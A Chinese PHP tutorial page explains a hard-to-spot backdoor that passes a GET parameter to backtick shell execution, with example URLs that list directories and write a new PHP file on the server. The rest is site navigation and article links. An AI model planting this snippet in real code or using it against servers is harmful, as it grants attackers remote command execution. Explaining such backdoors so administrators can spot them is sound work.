首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

一个不易被发现的PHP后门代码解析

Posted in PHP onJuly 05, 2014

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

我用 appserv 和虚拟主机已经测试成功。

一个不易被发现的PHP后门代码解析

- Author -

shichen2014

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
PHP下MAIL的另一解决方案
Oct 09 PHP
简单的过滤字符串中的HTML标记
Dec 25 PHP
新手学PHP之数据库操作详解及乱码解决!
Jan 02 PHP
excellent!――ASCII Art(由目标图象生成ascii)
Feb 20 PHP
PHP教程 变量定义
Oct 23 PHP
Memcache 在PHP中的使用技巧
Feb 08 PHP
解析PHP中常见的mongodb查询操作
Jun 20 PHP
ThinkPHP验证码使用简明教程
Mar 05 PHP
PHP保存带BOM文件的方法
Feb 12 PHP
iis 7下安装laravel 5.4环境的方法教程
Jun 14 PHP
Laravel5.5以下版本中如何自定义日志行为详解
Aug 01 PHP
php实现记事本案例
Oct 20 PHP
linux下使用crontab实现定时PHP计划任务失败的原因分析
Jul 05 #PHP
php操作redis中的hash和zset类型数据的方法和代码例子
Jul 05 #PHP
采用memcache在web集群中实现session的同步会话
Jul 05 #PHP
30个php操作redis常用方法代码例子
Jul 05 #PHP
PHP在网页中动态生成PDF文件详细教程
Jul 05 #PHP
PHP数组遍历知识汇总(包含遍历方法、数组指针操作函数、数组遍历测速)
Jul 05 #PHP
php遍历数组的4种方法总结
Jul 05 #PHP
OpenFeign(1) K8s(1) NTP(1) HttpClient(1) swing(1) Windows Server 2022(3) Hive(5) Windows Server(4) SandBox(1) calc(1)
You might like
基于PHP一些十分严重的缺陷详解
2013/06/03 PHP
PHP设计模式之工厂模式定义与用法详解
2018/04/03 PHP
Javascript Tab 导航插件 (23个)
2009/06/11 Javascript
Javascript常考语句107条收集
2010/03/09 Javascript
JQuery获取各种宽度、高度(format函数)实例
2013/03/04 Javascript
JavaScript中的noscript元素属性位置及作用介绍
2013/04/11 Javascript
两个多选select(multiple左右)添加、删除选项和取值实例
2014/05/12 Javascript
js实现获取焦点后光标在字符串后
2014/09/17 Javascript
JavaScript中的变量作用域介绍
2014/12/31 Javascript
javascript手工制作悬浮菜单
2015/02/12 Javascript
跟我学习javascript创建对象(类)的8种方法
2015/11/20 Javascript
jQuery操作cookie
2016/08/08 Javascript
修改ligerui 默认确认按钮的方法
2016/12/27 Javascript
BootStrap框架中的data-[ ]自定义属性理解(推荐)
2017/02/14 Javascript
基于webpack 实用配置方法总结
2017/09/28 Javascript
NW.js 简介与使用方法
2018/02/01 Javascript
Vue框架里使用Swiper的方法示例
2018/09/20 Javascript
js控制随机数生成概率代码实例
2019/03/21 Javascript
微信小程序 调用微信授权窗口相关问题解决
2019/07/25 Javascript
python解析html开发库pyquery使用方法
2014/02/07 Python
Linux下用Python脚本监控目录变化代码分享
2015/05/21 Python
对python numpy数组中冒号的使用方法详解
2018/04/17 Python
利用Python如何批量更新服务器文件
2018/07/29 Python
python 多线程重启方法
2019/02/18 Python
python实现的爬取电影下载链接功能示例
2019/08/26 Python
python创建n行m列数组示例
2019/12/02 Python
Python TKinter如何自动关闭主窗口
2020/02/26 Python
如何使用repr调试python程序
2020/02/28 Python
戴森台湾线上商城:Dyson Taiwan
2018/05/21 全球购物
英国在线潜水商店:Simply Scuba
2019/03/25 全球购物
Lentiamo比利时:便宜的隐形眼镜
2020/02/14 全球购物
文明餐桌行动实施方案
2014/02/19 职场文书
人事专员工作职责
2014/02/22 职场文书
2015最新学生自我评价范文
2015/03/03 职场文书
python3 实现mysql数据库连接池的示例代码
2021/04/17 Python
详解使用内网穿透工具Ngrok代理本地服务
2022/03/31 Servers